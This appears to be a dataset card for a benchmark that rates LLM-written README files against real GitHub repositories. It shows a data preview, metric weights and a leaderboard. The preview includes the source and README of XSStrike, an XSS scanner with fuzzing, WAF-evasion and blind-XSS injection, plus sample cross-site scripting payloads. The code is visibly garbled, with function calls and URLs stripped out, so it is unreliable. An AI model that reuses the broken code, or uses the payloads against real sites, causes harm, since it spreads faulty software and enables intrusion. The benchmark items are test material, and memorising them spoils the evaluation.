core.config.globalVariables[name] = data def isBadContext(position, non_executable_contexts): badContext = '' for each in non_executable_contexts: if each[0] < position < each[1]: badContext = each[2] break return badContext def equalize(array, number): if len(array) < number: array.append('') def escaped(position, string): usable = string[:position][::-1] match ='^\\*', usable) if match: match = if len(match) == 1: return True elif len(match) % 2 == 0: return False else: return True else: return False File: core/ import re from core.config import xsschecker from core.utils import stripper def jsContexter(script): broken = script.split(xsschecker) pre = broken[0] # remove everything that is between {..}, "..." or '...' pre = re.sub(r'(?s)\{.*?\}|(?s)\(.*?\)|(?s)".*?"|(?s)\'.*?\'', '', pre) breaker = '' num = 0 for char in pre: # iterate over the remaining characters if char == '{': breaker += '}' elif char == '(': breaker += ';)' # yes, it should be ); but we will invert the whole thing later elif char == '[': breaker += ']' elif char == '/': try: if pre[num + 1] == '*': breaker += '/*' except IndexError: pass elif char == '}': # we encountered a } so we will strip off "our }" because this one does the job breaker = stripper(breaker, '}') elif char == ')': # we encountered a ) so we will strip off "our }" because this one does the job breaker = stripper(breaker, ')') elif breaker == ']': # we encountered a ] so we will strip off "our }" because this one does the job breaker = stripper(breaker, ']') num += 1 return breaker[::-1] # invert the breaker string File: core/ import copy from random import randint from time import sleep from urllib.parse import unquote from core.colors import end, red, green, yellow from core.config import fuzzes, xsschecker from core.requester import requester from core.utils import replaceValue, counter from core.log import setup_logger logger = setup_logger(__name__) def fuzzer(url, params, headers, GET, delay, timeout, WAF, encoding): for fuzz in fuzzes: if delay == 0: delay = 0 t = delay + randint(delay, delay * 2) + counter(fuzz) sleep(t) try: if encoding: fuzz = encoding(unquote(fuzz)) data = replaceValue(params, xsschecker, fuzz, copy.deepcopy) response = requester(url, data, headers, GET, delay/2, timeout) except: logger.error('WAF is dropping suspicious requests.') if delay == 0:'Delay has been increased to %s6%s seconds.' % (green, end)) delay += 6 limit = (delay + 1) * 50 timer = -1 while timer < limit:'\rFuzzing will continue after %s%i%s seconds.\t\t\r' % (green, limit, end)) limit -= 1 sleep(1) try: requester(url, params, headers, GET, 0, 10) logger.good('Pheww! Looks like sleeping for %s%i%s seconds worked!' % ( green, ((delay + 1) * 2), end)) except: logger.error('\nLooks like WAF has blocked our IP Address. Sorry!') break if encoding: fuzz = encoding(fuzz) if fuzz.lower() in response.text.lower(): # if fuzz string is reflected in the response result = ('%s[passed] %s' % (green, end)) # if the server returned an error (Maybe WAF blocked it) elif str(response.status_code)[:1] != '2': result = ('%s[blocked] %s' % (red, end)) else: # if the fuzz string was not reflected in the response completely result = ('%s[filtered]%s' % (yellow, end))'%s %s' % (result, fuzz)) File: core/ from core.checker import checker def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding): positions = occurences.keys() sortedEfficiencies = {} # adding < > to environments anyway because they can be used in all contexts environments = set(['<', '>']) for i in range(len(positions)): sortedEfficiencies[i] = {} for i in occurences: occurences[i]['score'] = {} context = occurences[i]['context'] if context == 'comment': environments.add('-->') elif context == 'script': environments.add(occurences[i]['details']['quote']) environments.add('</scRipT/>') elif context == 'attribute': if occurences[i]['details']['type'] == 'value': if occurences[i]['details']['name'] == 'srcdoc': # srcdoc attribute accepts html data with html entity encoding environments.add('&lt;') # so let's add the html entity environments.add('&gt;') # encoded versions of < and > if occurences[i]['details']['quote']: environments.add(occurences[i]['details']['quote']) for environment in environments: if environment: efficiencies = checker( url, params, headers, GET, delay, environment, positions, timeout, encoding) efficiencies.extend([0] * (len(occurences) - len(efficiencies))) for occurence, efficiency in zip(occurences, efficiencies): occurences[occurence]['score'][environment] = efficiency return occurences File: core/ import os import tempfile from core.config import defaultEditor from core.colors import white, yellow from core.log import setup_logger logger = setup_logger(__name__) def prompt(default=None): # try assigning default editor, if fails, use default editor = os.environ.get('EDITOR', defaultEditor) # create a temporary file and open it with tempfile.NamedTemporaryFile(mode='r+') as tmpfile: if default: # if prompt should have some predefined text tmpfile.write(default) tmpfile.flush() child_pid = os.fork() is_child = child_pid == 0 if is_child: # opens the file in the editor try: os.execvp(editor, [editor,]) except FileNotFoundError: logger.error('You don\'t have either a default $EDITOR \ value defined nor \'nano\' text editor')'Execute %s`export EDITOR=/pat/to/your/editor` \ %sthen run XSStrike again.\n\n' % (yellow,white)) exit(1) else: os.waitpid(child_pid, 0) # wait till the editor gets closed return # read the file File: core/ import copy from fuzzywuzzy import fuzz import re from urllib.parse import unquote from core.config import xsschecker from core.requester import requester from core.utils import replaceValue, fillHoles def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding): checkString = 'st4r7s' + payload + '3nd' if encoding: checkString = encoding(unquote(checkString)) response = requester(url, replaceValue( params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower() reflectedPositions = [] for match in re.finditer('st4r7s', response): reflectedPositions.append(match.start()) filledPositions = fillHoles(positions, reflectedPositions) # Itretating over the reflections num = 0 efficiencies = [] for position in filledPositions: allEfficiencies = [] try: reflected = response[reflectedPositions[num] :reflectedPositions[num]+len(checkString)] efficiency = fuzz.partial_ratio(reflected, checkString.lower()) allEfficiencies.append(efficiency) except IndexError: pass if position: reflected = response[position:position+len(checkString)] if encoding: checkString = encoding(checkString.lower()) efficiency = fuzz.partial_ratio(reflected, checkString) if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')): efficiency = 90 allEfficiencies.append(efficiency) efficiencies.append(max(allEfficiencies)) else: efficiencies.append(0) num += 1 return list(filter(None, efficiencies)) File: core/ import re import concurrent.futures from urllib.parse import urlparse from core.dom import dom from core.log import setup_logger from core.utils import getUrl, getParams from core.requester import requester from core.zetanize import zetanize from plugins.retireJs import retireJs logger = setup_logger(__name__) def photon(seedUrl, headers, level, threadCount, delay, timeout, skipDOM): forms = [] # web forms processed = set() # urls that have been crawled storage = set() # urls that belong to the target i.e. in-scope schema = urlparse(seedUrl).scheme # extract the scheme e.g. http or https host = urlparse(seedUrl).netloc # extract the host e.g. main_url = schema + '://' + host # join scheme and host to make the root url storage.add(seedUrl) # add the url to storage checkedDOMs = [] def rec(target): processed.add(target) printableTarget = '/'.join(target.split('/')[3:]) if len(printableTarget) > 40: printableTarget = printableTarget[-40:] else: printableTarget = (printableTarget + (' ' * (40 - len(printableTarget))))'Parsing %s\r' % printableTarget) url = getUrl(target, True) params = getParams(target, '', True) if '=' in target: # if there's a = in the url, there should be GET parameters inps = [] for name, value in params.items(): inps.append({'name': name, 'value': value}) forms.append({0: {'action': url, 'method': 'get', 'inputs': inps}}) response = requester(url, params, headers, True, delay, timeout).text retireJs(url, response) if not skipDOM: highlighted = dom(response) clean_highlighted = ''.join([re.sub(r'^\d+\s+', '', line) for line in highlighted]) if highlighted and clean_highlighted not in checkedDOMs: checkedDOMs.append(clean_highlighted) logger.good('Potentially vulnerable objects found at %s' % url) logger.red_line(level='good') for line in highlighted: logger.no_format(line, level='good') logger.red_line(level='good') forms.append(zetanize(response)) matches = re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', response) for link in matches: # iterate over the matches # remove everything after a "#" to deal with in-page anchors link = link.split('#')[0] if link.endswith(('.pdf', '.png', '.jpg', '.jpeg', '.xls', '.xml', '.docx', '.doc')): pass else: if link[:4] == 'http': if link.startswith(main_url): storage.add(link) elif link[:2] == '//': if link.split('/')[2].startswith(host): storage.add(schema + link) elif link[:1] == '/': storage.add(main_url + link) else: storage.add(main_url + '/' + link) try: for x in range(level): urls = storage - processed # urls to crawl = all urls - urls that have been crawled # for url in urls: # rec(url) threadpool = concurrent.futures.ThreadPoolExecutor( max_workers=threadCount) futures = (threadpool.submit(rec, url) for url in urls) for i in concurrent.futures.as_completed(futures): pass except KeyboardInterrupt: return [forms, processed] return [forms, processed] File: core/ import re from core.colors import end, red, yellow if len(end) < 1: end = red = yellow = '*' def dom(response): highlighted = [] sources = r'''\b(?:document\.(URL|documentURI|URLUnencoded|baseURI|cookie|referrer)|location\.(href|search|hash|pathname)|window\.name|history\.(pushState|replaceState)(local|session)Storage)\b''' sinks = r'''\b(?:eval|evaluate|execCommand|assign|navigate|getResponseHeaderopen|showModalDialog|Function|set(Timeout|Interval|Immediate)|execScript|crypto.generateCRMFRequest|ScriptElement\.(src|text|textContent|innerText)|.*?\.onEventName|document\.(write|writeln)|.*?\.innerHTML|Range\.createContextualFragment|(document|window)\.location)\b''' scripts = re.findall(r'(?i)(?s)<script[^>]*>(.*?)</script>', response) sinkFound, sourceFound = False, False for script in scripts: script = script.split('\n') num = 1 allControlledVariables = set() try: for newLine in script: line = newLine parts = line.split('var ') controlledVariables = set() if len(parts) > 1: for part in parts: for controlledVariable in allControlledVariables: if controlledVariable in part: controlledVariables.add('[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$')) pattern = re.finditer(sources, newLine) for grp in pattern: if grp: source = newLine[grp.start():grp.end()].replace(' ', '') if source: if len(parts) > 1: for part in parts: if source in part: controlledVariables.add('[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$')) line = line.replace(source, yellow + source + end) for controlledVariable in controlledVariables: allControlledVariables.add(controlledVariable) for controlledVariable in allControlledVariables: matches = list(filter(None, re.findall(r'\b%s\b' % controlledVariable, line))) if matches: sourceFound = True line = re.sub(r'\b%s\b' % controlledVariable, yellow + controlledVariable + end, line) pattern = re.finditer(sinks, newLine) for grp in pattern: if grp: sink = newLine[grp.start():grp.end()].replace(' ', '') if sink: line = line.replace(sink, red + sink + end) sinkFound = True if line != newLine: highlighted.append('%-3s %s' % (str(num), line.lstrip(' '))) num += 1 except MemoryError: pass if sinkFound or sourceFound: return highlighted else: return [] File: core/ import sys import os import platform colors = True # Output should be colored machine = sys.platform # Detecting the os of current system checkplatform = platform.platform() # Get current version of OS if machine.lower().startswith(('os', 'win', 'darwin', 'ios')): colors = False # Colors shouldn't be displayed on mac & windows if checkplatform.startswith("Windows-10") and int(platform.version().split(".")[2]) >= 10586: colors = True os.system('') # Enables the ANSI if not colors: end = red = white = green = yellow = run = bad = good = info = que = '' else: white = '\033[97m' green = '\033[92m' red = '\033[91m' yellow = '\033[93m' end = '\033[0m' back = '\033[7;91m' info = '\033[93m[!]\033[0m' que = '\033[94m[?]\033[0m' bad = '\033[91m[-]\033[0m' good = '\033[92m[+]\033[0m' run = '\033[97m[~]\033[0m' File: modes/ import copy import re import core.config from core.colors import green, end from core.config import xsschecker from core.filterChecker import filterChecker from core.generator import generator from core.htmlParser import htmlParser from core.requester import requester from core.log import setup_logger logger = setup_logger(__name__) def crawl(scheme, host, main_url, form, blindXSS, blindPayload, headers, delay, timeout, encoding): if form: for each in form.values(): url = each['action'] if url: if url.startswith(main_url): pass elif url.startswith('//') and url[2:].startswith(host): url = scheme + '://' + url[2:] elif url.startswith('/'): url = scheme + '://' + host + url elif re.match(r'\w', url[0]): url = scheme + '://' + host + '/' + url if url not in core.config.globalVariables['checkedForms']: core.config.globalVariables['checkedForms'][url] = [] method = each['method'] GET = True if method == 'get' else False inputs = each['inputs'] paramData = {} for one in inputs: paramData[one['name']] = one['value'] for paramName in paramData.keys(): if paramName not in core.config.globalVariables['checkedForms'][url]: core.config.globalVariables['checkedForms'][url].append(paramName) paramsCopy = copy.deepcopy(paramData) paramsCopy[paramName] = xsschecker response = requester( url, paramsCopy, headers, GET, delay, timeout) occurences = htmlParser(response, encoding) positions = occurences.keys() occurences = filterChecker( url, paramsCopy, headers, GET, delay, occurences, timeout, encoding) vectors = generator(occurences, response.text) if vectors: for confidence, vects in vectors.items(): try: payload = list(vects)[0] logger.vuln('Vulnerable webpage: %s%s%s' % (green, url, end)) logger.vuln('Vector for %s%s%s: %s' % (green, paramName, end, payload)) break except IndexError: pass if blindXSS and blindPayload: paramsCopy[paramName] = blindPayload requester(url, paramsCopy, headers, GET, delay, timeout) File: modes/ import copy from urllib.parse import urlparse from core.colors import green, end from core.config import xsschecker from core.fuzzer import fuzzer from core.requester import requester from core.utils import getUrl, getParams from core.wafDetector import wafDetector from core.log import setup_logger logger = setup_logger(__name__) def singleFuzz(target, paramData, encoding, headers, delay, timeout): GET, POST = (False, True) if paramData else (True, False) # If the user hasn't supplied the root url with http(s), we will handle it if not target.startswith('http'): try: response = requester('https://' + target, {}, headers, GET, delay, timeout) target = 'https://' + target except: target = 'http://' + target logger.debug('Single Fuzz target: {}'.format(target)) host = urlparse(target).netloc # Extracts host out of the url logger.debug('Single fuzz host: {}'.format(host)) url = getUrl(target, GET) logger.debug('Single fuzz url: {}'.format(url)) params = getParams(target, paramData, GET) logger.debug_json('Single fuzz params:', params) if not params: logger.error('No parameters to test.') quit() WAF = wafDetector( url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout) if WAF: logger.error('WAF detected: %s%s%s' % (green, WAF, end)) else: logger.good('WAF Status: %sOffline%s' % (green, end)) for paramName in params.keys():'Fuzzing parameter: %s' % paramName) paramsCopy = copy.deepcopy(params) paramsCopy[paramName] = xsschecker fuzzer(url, paramsCopy, headers, GET, delay, timeout, WAF, encoding) File: modes/ File: modes/ import copy from urllib.parse import urlparse, unquote from core.colors import good, green, end from core.requester import requester from core.utils import getUrl, getParams from core.log import setup_logger logger = setup_logger(__name__) def bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout): GET, POST = (False, True) if paramData else (True, False) host = urlparse(target).netloc # Extracts host out of the url logger.debug('Parsed host to bruteforce: {}'.format(host)) url = getUrl(target, GET) logger.debug('Parsed url to bruteforce: {}'.format(url)) params = getParams(target, paramData, GET) logger.debug_json('Bruteforcer params:', params) if not params: logger.error('No parameters to test.') quit() for paramName in params.keys(): progress = 1 paramsCopy = copy.deepcopy(params) for payload in payloadList:'Bruteforcing %s[%s%s%s]%s: %i/%i\r' % (green, end, paramName, green, end, progress, len(payloadList))) if encoding: payload = encoding(unquote(payload)) paramsCopy[paramName] = payload response = requester(url, paramsCopy, headers, GET, delay, timeout).text if encoding: payload = encoding(payload) if payload in response:'%s %s' % (good, payload)) progress += 1 logger.no_format('') File: modes/ import copy import re from urllib.parse import urlparse, quote, unquote from core.checker import checker from core.colors import end, green, que import core.config from core.config import xsschecker, minEfficiency from core.dom import dom from core.filterChecker import filterChecker from core.generator import generator from core.htmlParser import htmlParser from core.requester import requester from core.utils import getUrl, getParams, getVar from core.wafDetector import wafDetector from core.log import setup_logger logger = setup_logger(__name__) def scan(target, paramData, encoding, headers, delay, timeout, skipDOM, skip): GET, POST = (False, True) if paramData else (True, False) # If the user hasn't supplied the root url with http(s), we will handle it if not target.startswith('http'): try: response = requester('https://' + target, {}, headers, GET, delay, timeout) target = 'https://' + target except: target = 'http://' + target logger.debug('Scan target: {}'.format(target)) response = requester(target, {}, headers, GET, delay, timeout).text if not skipDOM:'Checking for DOM vulnerabilities') highlighted = dom(response) if highlighted: logger.good('Potentially vulnerable objects found') logger.red_line(level='good') for line in highlighted: logger.no_format(line, level='good') logger.red_line(level='good') host = urlparse(target).netloc # Extracts host out of the url logger.debug('Host to scan: {}'.format(host)) url = getUrl(target, GET) logger.debug('Url to scan: {}'.format(url)) params = getParams(target, paramData, GET) logger.debug_json('Scan parameters:', params) if not params: logger.error('No parameters to test.') quit() WAF = wafDetector( url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout) if WAF: logger.error('WAF detected: %s%s%s' % (green, WAF, end)) else: logger.good('WAF Status: %sOffline%s' % (green, end)) for paramName in params.keys(): paramsCopy = copy.deepcopy(params)'Testing parameter: %s' % paramName) if encoding: paramsCopy[paramName] = encoding(xsschecker) else: paramsCopy[paramName] = xsschecker response = requester(url, paramsCopy, headers, GET, delay, timeout) occurences = htmlParser(response, encoding) positions = occurences.keys() logger.debug('Scan occurences: {}'.format(occurences)) if not occurences: logger.error('No reflection found') continue else:'Reflections found: %i' % len(occurences))'Analysing reflections') efficiencies = filterChecker( url, paramsCopy, headers, GET, delay, occurences, timeout, encoding) logger.debug('Scan efficiencies: {}'.format(efficiencies))'Generating payloads') vectors = generator(occurences, response.text) total = 0 for v in vectors.values(): total += len(v) if total == 0: logger.error('No vectors were crafted.') continue'Payloads generated: %i' % total) progress = 0 for confidence, vects in vectors.items(): for vect in vects: if core.config.globalVariables['path']: vect = vect.replace('/', '%2F') loggerVector = vect progress += 1'Progress: %i/%i\r' % (progress, total)) if not GET: vect = unquote(vect) efficiencies = checker( url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding) if not efficiencies: for i in range(len(occurences)): efficiencies.append(0) bestEfficiency = max(efficiencies) if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95): logger.red_line() logger.good('Payload: %s' % loggerVector)'Efficiency: %i' % bestEfficiency)'Confidence: %i' % confidence) if not skip: choice = input( '%s Would you like to continue scanning? [y/N] ' % que).lower() if choice != 'y': quit() elif bestEfficiency > minEfficiency: logger.red_line() logger.good('Payload: %s' % loggerVector)'Efficiency: %i' % bestEfficiency)'Confidence: %i' % confidence) logger.no_format('') File: plugins/ File: plugins/ import re import json import hashlib from urllib.parse import urlparse from core.colors import green, end from core.requester import requester from core.utils import deJSON, js_extractor, handle_anchor, getVar, updateVar from core.log import setup_logger logger = setup_logger(__name__) def is_defined(o): return o is not None def scan(data, extractor, definitions, matcher=None): matcher = matcher or _simple_match detected = [] for component in definitions: extractors = definitions[component].get( "extractors", None).get( extractor, None) if (not is_defined(extractors)): continue for i in extractors: match = matcher(i, data) if (match): detected.append({"version": match, "component": component, "detection": extractor}) return detected def _simple_match(regex, data): regex = deJSON(regex) match =, data) return if match else None def _replacement_match(regex, data): try: regex = deJSON(regex) group_parts_of_regex = r'^\/(.*[^\\])\/([^\/]+)\/$' ar =, regex) search_for_regex = "(" + + ")" match =, data) ver = None if (match): ver = re.sub(,, return ver return None except: return None def _scanhash(hash, definitions): for component in definitions: hashes = definitions[component].get("extractors", None).get("hashes", None) if (not is_defined(hashes)): continue for i in hashes: if (i == hash): return [{"version": hashes[i], "component": component, "detection": 'hash'}] return [] def check(results, definitions): for r in results: result = r if (not is_defined(definitions[result.get("component", None)])): continue vulns = definitions[ result.get( "component", None)].get( "vulnerabilities", None) for i in range(len(vulns)): if (not _is_at_or_above(result.get("version", None), vulns[i].get("below", None))): if (is_defined(vulns[i].get("atOrAbove", None)) and not _is_at_or_above( result.get("version", None), vulns[i].get("atOrAbove", None))): continue vulnerability = {"info": vulns[i].get("info", None)} if (vulns[i].get("severity", None)): vulnerability["severity"] = vulns[i].get("severity", None) if (vulns[i].get("identifiers", None)): vulnerability["identifiers"] = vulns[ i].get("identifiers", None) result["vulnerabilities"] = result.get( "vulnerabilities", None) or [] result["vulnerabilities"].append(vulnerability) return results def unique(ar): return list(set(ar)) def _is_at_or_above(version1, version2): # print "[",version1,",", version2,"]" v1 = re.split(r'[.-]', version1) v2 = re.split(r'[.-]', version2) l = len(v1) if len(v1) > len(v2) else len(v2) for i in range(l): v1_c = _to_comparable(v1[i] if len(v1) > i else None) v2_c = _to_comparable(v2[i] if len(v2) > i else None) # print v1_c, "vs", v2_c if (not isinstance(v1_c, type(v2_c))): return isinstance(v1_c, int) if (v1_c > v2_c): return True if (v1_c < v2_c): return False return True def _to_comparable(n): if (not is_defined(n)): return 0 if ('^[0-9]+$', n)): return int(str(n), 10) return n def _replace_version(jsRepoJsonAsText): return re.sub(r'[.0-9]*', '[0-9][0-9.a-z_\-]+', jsRepoJsonAsText) def is_vulnerable(results): for r in results: if ('vulnerabilities' in r): # print r return True return False def scan_uri(uri, definitions): result = scan(uri, 'uri', definitions) return check(result, definitions) def scan_filename(fileName, definitions): result = scan(fileName, 'filename', definitions) return check(result, definitions) def scan_file_content(content, definitions): result = scan(content, 'filecontent', definitions) if (len(result) == 0): result = scan(content, 'filecontentreplace', definitions, _replacement_match) if (len(result) == 0): result = _scanhash( hashlib.sha1( content.encode('utf8')).hexdigest(), definitions) return check(result, definitions) def main_scanner(uri, response): definitions = getVar('definitions') uri_scan_result = scan_uri(uri, definitions) filecontent = response filecontent_scan_result = scan_file_content(filecontent, definitions) uri_scan_result.extend(filecontent_scan_result) result = {} if uri_scan_result: result['component'] = uri_scan_result[0]['component'] result['version'] = uri_scan_result[0]['version'] result['vulnerabilities'] = [] vulnerabilities = set() for i in uri_scan_result: k = set() try: for j in i['vulnerabilities']: vulnerabilities.add(str(j)) except KeyError: pass for vulnerability in vulnerabilities: result['vulnerabilities'].append(json.loads(vulnerability.replace('\'', '"'))) return result def retireJs(url, response): scripts = js_extractor(response) for script in scripts: if script not in getVar('checkedScripts'): updateVar('checkedScripts', script, 'add') uri = handle_anchor(url, script) response = requester(uri, '', getVar('headers'), True, getVar('delay'), getVar('timeout')).text result = main_scanner(uri, response) if result: logger.red_line() logger.good('Vulnerable component: ' + result['component'] + ' v' + result['version'])'Component location: %s' % uri) details = result['vulnerabilities']'Total vulnerabilities: %i' % len(details)) for detail in details:'%sSummary:%s %s' % (green, end, detail['identifiers']['summary']))'Severity: %s' % detail['severity'])'CVE: %s' % detail['identifiers']['CVE'][0]) logger.red_line()
<h1 align="center"> <br> <a href=""><img src="" alt="XSStrike"></a> <br> XSStrike <br> </h1> <h4 align="center">Advanced XSS Detection Suite</h4> <p align="center"> <a href=""> <img src=""> </a> <a href=""> <img src=""> </a> <a href=""> <img src=""> </a> </p> ![multi xss]( <p align="center"> <a href="">XSStrike Wiki</a> • <a href="">Usage</a> • <a href="">FAQ</a> • <a href="">For Developers</a> • <a href="">Compatibility</a> • <a href="">Gallery</a> </p> XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler. Instead of injecting payloads and checking it works like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. Here are some examples of the payloads generated by XSStrike: ``` }]};(confirm)()//\ <A%0aONMouseOvER%0d=%0d[8].find(confirm)>z </tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z </SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()// ``` Apart from that, XSStrike has crawling, fuzzing, parameter discovery, WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities. ### Main Features - Reflected and DOM XSS scanning - Multi-threaded crawling - Context analysis - Configurable core - WAF detection & evasion - Outdated JS lib scanning - Intelligent payload generator - Handmade HTML & JavaScript parser - Powerful fuzzing engine - Blind XSS support - Highly researched work-flow - Complete HTTP support - Bruteforce payloads from a file - Powered by [Photon](, [Zetanize]( and [Arjun]( - Payload Encoding ### Documentation - [Usage]( - [Compatibility & Dependencies]( ### FAQ - [It says fuzzywuzzy isn't installed but it is.]( - [What's up with Blind XSS?]( - [Why XSStrike boasts that it is the most advanced XSS detection suite?]( - [I like the project, what enhancements and features I can expect in future?]( - [What's the false positive/negative rate?]( - [Tool xyz works against the target, while XSStrike doesn't!]( - [Can I copy it's code?]( - [What if I want to embed it into a proprietary software?]( ### Gallery #### DOM XSS ![dom xss]( #### Reflected XSS ![multi xss]( #### Crawling ![crawling]( #### Fuzzing ![fuzzing]( #### Bruteforcing payloads from a file ![bruteforcing]( #### Interactive HTTP Headers Prompt ![headers]( #### Hidden Parameter Discovery ![arjun]( ### Contribution, Credits & License Ways to contribute - Suggest a feature - Report a bug - Fix something and open a pull request - Help me document the code - Spread the word Licensed under the GNU GPLv3, see [LICENSE](LICENSE) for more information. The WAF signatures in `/db/wafSignatures.json` are taken & modified from [sqlmap]( I extracted them from sqlmap's waf detection modules which can found [here]( and converted them to JSON.\ `/plugins/` is a modified version of [retirejslib](
"File:\n\n\"\"\" A wechat personal account api project\nSee:\n
"# itchat\n\n[![Gitter][gitter-picture]][gitter] ![py27][py27] ![py35][py35] [English version][engli(...TRUNCATED)
"File:\n\n#!/usr/bin/env python3\nfrom dotenv import load_dotenv\n\n# Load default enviro(...TRUNCATED)
"# Translations:\n\n[<img title=\"عربي\" alt=\"عربي\" src=\"
"File:\n\nfrom setuptools import setup, find_packages\n\n\nsetup(name='MyShell-OpenVoice',\(...TRUNCATED)
"<div align=\"center\">\n <div>&nbsp;</div>\n <img src=\"resources/openvoicelogo.jpg\" width=\"400(...TRUNCATED)
"File:\n\nfrom setuptools import setup\n\nsetup()\n\n\n\nFile: docs/installation/generate.p(...TRUNCATED)
"<h2 align=\"center\">\n <a href=\"\" target=\"blank_\">\n <img height=\"(...TRUNCATED)
"File: scripts/\n\n#!/usr/bin/python\n\n\"\"\"\n This script will scrape the r-(...TRUNCATED)
"# Awesome Machine Learning [![Awesome](
"File:\n\n\n\n\nFile: recursion_dynamic/\n\n\n\n\nFile: recursion_dynamic/pow(...TRUNCATED)
"<br/>\n<p align=\"center\">\n <img src=\"
"File:\n\n#!/usr/bin/env python3\n \nfrom concurrent.futures import ThreadPoolExecutor, as_(...TRUNCATED)
"<p align=\"center\"><img src=\"\" width=\"400px\" height=\"150px(...TRUNCATED)
"File:\n\n# Copyright (c) Meta Platforms, Inc. and affiliates.\n# This so(...TRUNCATED)
"## **Note of deprecation**\n\nThank you for developing with Llama models. As part of the Llama 3.1 (...TRUNCATED)
"File: projects/\n\nfrom datetime import date # import(...TRUNCATED)
"<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![forthebadge](https(...TRUNCATED)

Generate README Eval

The generate-readme-eval is a dataset (train split) and benchmark (test split) to evaluate the effectiveness of LLMs when summarizing entire GitHub repos in form of a file. The datset is curated from top 400 real Python repositories from GitHub with at least 1000 stars and 100 forks. The script used to generate the dataset can be found here. For the dataset we restrict ourselves to GH repositories that are less than 100k tokens in size to allow us to put the entire repo in the context of LLM in a single call. The train split of the dataset can be used to fine-tune your own model, the results reported here are for the test split.

To evaluate a LLM on the benchmark we can use the evaluation script given here. During evaluation we prompt the LLM to generate a structured file using the entire contents of the repository (repo_content). We evaluate the output response from LLM by comparing it with the actual README file of that repository across several different metrics.

In addition to the traditional NLP metircs like BLEU, ROUGE scores and cosine similarity, we also compute custom metrics that capture structural similarity, code consistency (from code to README), readability (FRES) and information retrieval. The final score is generated between by taking a weighted average of the metrics. The weights used for the final score are shown below.

weights = {
    'bleu': 0.1,
    'rouge-1': 0.033,
    'rouge-2': 0.033,
    'rouge-l': 0.034,
    'cosine_similarity': 0.1,
    'structural_similarity': 0.1,
    'information_retrieval': 0.2,
    'code_consistency': 0.2,
    'readability': 0.2

At the end of evaluation the script will print the metrics and store the entire run in a log file. If you want to add your model to the leaderboard please create a PR with the log file of the run and details about the model.

If we use the existing files in the repositories as the golden output, we would get a score of 56.79 on this benchmark. We can validate it by running the evaluation script with --oracle flag. The oracle run log is available here.


The current SOTA model on this benchmark in zero shot setting is Gemini-1.5-Flash-Exp-0827. It scores the highest across a number of different metrics.

Model Score BLEU ROUGE-1 ROUGE-2 ROUGE-l Cosine-Sim Structural-Sim Info-Ret Code-Consistency Readability Logs
llama3.1-8b-instruct 24.43 0.72 11.96 1.69 11.51 30.29 24.16 44.50 7.96 37.90 link
mistral-nemo-instruct-2407 25.62 1.09 11.24 1.70 10.94 26.62 24.26 52.00 8.80 37.30 link
gpt-4o-mini-2024-07-18 32.16 1.64 15.46 3.85 14.84 40.57 23.81 72.50 4.77 44.81 link
gpt-4o-2024-08-06 33.13 1.68 15.36 3.59 14.81 40.00 23.91 74.50 8.36 44.33 link
o1-mini-2024-09-12 33.05 3.13 15.39 3.51 14.81 42.49 27.55 80.00 7.78 35.27 link
gemini-1.5-flash-8b-exp-0827 32.12 1.36 14.66 3.31 14.14 38.31 23.00 70.00 7.43 46.47 link
gemini-1.5-flash-exp-0827 33.43 1.66 16.00 3.88 15.33 41.87 23.59 76.50 7.86 43.34 link
gemini-1.5-pro-exp-0827 32.51 2.55 15.27 4.97 14.86 41.09 23.94 72.82 6.73 43.34 link
oracle-score 56.79 100.00 100.00 100.00 100.00 100.00 98.24 59.00 11.01 14.84 link


This benchmark is interesting because it is not that easy to few-shot your way to improve performance. There are couple of reasons for that:

  1. The average context length required for each item can be up to 100k tokens which makes it out of the reach of most models except Google Gemini which has a context legnth of up to 2 Million tokens.

  2. There is a trade-off in accuracy inherit in the benchmark as adding more examples makes some of the metrics like information_retrieval and readability worse. At larger contexts models do not have perfect recall and may miss important information.

Our experiments with few-shot prompts confirm this, the maximum overall score is at 1-shot and adding more examples doesn't help after that.

Model Score BLEU ROUGE-1 ROUGE-2 ROUGE-l Cosine-Sim Structural-Sim Info-Ret Code-Consistency Readability Logs
0-shot-gemini-1.5-flash-exp-0827 33.43 1.66 16.00 3.88 15.33 41.87 23.59 76.50 7.86 43.34 link
1-shot-gemini-1.5-flash-exp-0827 35.40 21.81 34.00 24.97 33.61 61.53 37.60 61.00 12.89 27.22 link
3-shot-gemini-1.5-flash-exp-0827 33.10 20.02 32.70 22.66 32.21 58.98 34.54 60.50 13.09 20.52 link
5-shot-gemini-1.5-flash-exp-0827 33.97 19.24 32.31 21.48 31.74 61.49 33.17 59.50 11.48 27.65 link
7-shot-gemini-1.5-flash-exp-0827 33.00 15.43 28.52 17.18 28.07 56.25 33.55 63.50 12.40 24.15 link
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